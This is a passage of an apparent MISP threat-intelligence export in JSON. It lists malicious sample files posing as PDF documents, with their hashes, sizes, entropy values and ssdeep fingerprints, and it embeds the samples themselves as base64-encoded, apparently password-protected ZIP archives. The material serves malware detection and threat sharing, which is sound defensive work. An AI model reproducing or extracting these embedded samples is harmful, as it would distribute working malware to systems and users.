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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "c0e50a57-4860-47c8-adfd-6c287c2d035a",
|
||
|
"value": "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936|164db8d1fe5f2ea9dd3ea826b2f0b808"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "30f320a6-a7ef-4d91-a736-c283b75f22ba",
|
||
|
"value": "PDF document, version 1.5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "e92b5145-d834-44b1-963f-6dbc6706c690",
|
||
|
"value": "6144:xaYsXXzUbbQ+6K4R44u+aUg031qLD0AjJ1sGBIK/:xaTXX+iKO1u5uzK/"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558014535",
|
||
|
"uuid": "9608228e-4373-44ac-9fdd-bd37d5b02275",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "9608228e-4373-44ac-9fdd-bd37d5b02275",
|
||
|
"referenced_uuid": "9156df9c-4067-422e-bd38-8c3908e8ea5f",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-d778-48d2-a710-4be7950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "9608228e-4373-44ac-9fdd-bd37d5b02275",
|
||
|
"referenced_uuid": "5cdd63dc-0b30-404e-a1c4-4479950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd6a47-543c-43fe-b89f-447b950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "ae9ed01d-f3ad-478b-bb91-11298a40fbc1",
|
||
|
"value": "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "f776b540-fcca-4c66-8893-edcdad7ff00b",
|
||
|
"value": "252891"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "ee181244-ea41-4d2e-8a66-62177efaf432",
|
||
|
"value": "7.9916147992407"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "c16fc5e8-717e-49b3-99d5-5863cf055b3b",
|
||
|
"value": "08b49fb9882bfc8f69beb594fa543c8a"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "8ca900cc-de41-427d-a168-ac258161c011",
|
||
|
"value": "201e85d6bc519ecc6dece75b2586e761a56db6a7"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "ba93fe18-9b09-4267-a47c-b1397bc7500e",
|
||
|
"value": "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "f12e7b2f-5c8a-4137-9afb-e86acdbcd902",
|
||
|
"value": "b4a446c95e7239a3e491ee38e77ce8e1e96c27ca9c1cc25ca941643f366c62f81eb9942a1d80304bfc321c24cef86288f315bf97eb5f3738ad3618fbb6c86eb8"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "a8115929-5cfc-4282-be04-9652248f41e9",
|
||
|
"value": "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73|08b49fb9882bfc8f69beb594fa543c8a"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "b9eecf42-8b42-4e3b-a36b-0dca3bf41f59",
|
||
|
"value": "PDF document, version 1.5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "8f33dccc-dcf5-45d6-be03-5d5662490fff",
|
||
|
"value": "6144:mc67OzUcoXxC24wOOLDbjRC4xzE7mkHNw+4je6iMllT:mcNzxer4fiDbjRhGDH9Oe6Hl1"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558014309",
|
||
|
"uuid": "9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
|
||
|
"referenced_uuid": "c22ccebe-e72f-4b92-9c63-a196b4959c43",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-ed6c-4be4-999f-4158950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
|
||
|
"referenced_uuid": "5cdd683b-6530-4b0d-a8de-40c1950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd6965-cd78-4435-a186-4f0a950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "2fd88b37-70fd-48b6-b918-c1d29b69eb38",
|
||
|
"value": "0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "54ffcd31-7d98-47c1-839e-d42b9ed54acd",
|
||
|
"value": "447466"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "3fecf7eb-28be-471d-a575-1076dc6a1dfb",
|
||
|
"value": "7.991595563552"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "98ef2711-7495-4299-923a-8b6380713a06",
|
||
|
"value": "1baa024f9cfab48b92c297aa406c91b5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "6c35d0d1-89d9-4118-a8ae-17663754cfcf",
|
||
|
"value": "7d5a1dc90d535e3cc552d0db02841d28fb1ae773"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "a053b420-013d-4a22-bcf9-7adf561277b0",
|
||
|
"value": "0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "6bd616bb-6010-41c8-b9f3-1c68921b40e5",
|
||
|
"value": "4137bd777e8167e964d3ebae98720cbf532cc0afac726522a668949dbc841150aa4aa600813142bb9ec6f999bd97ddd07b9bdf885034699305381382cfba6416"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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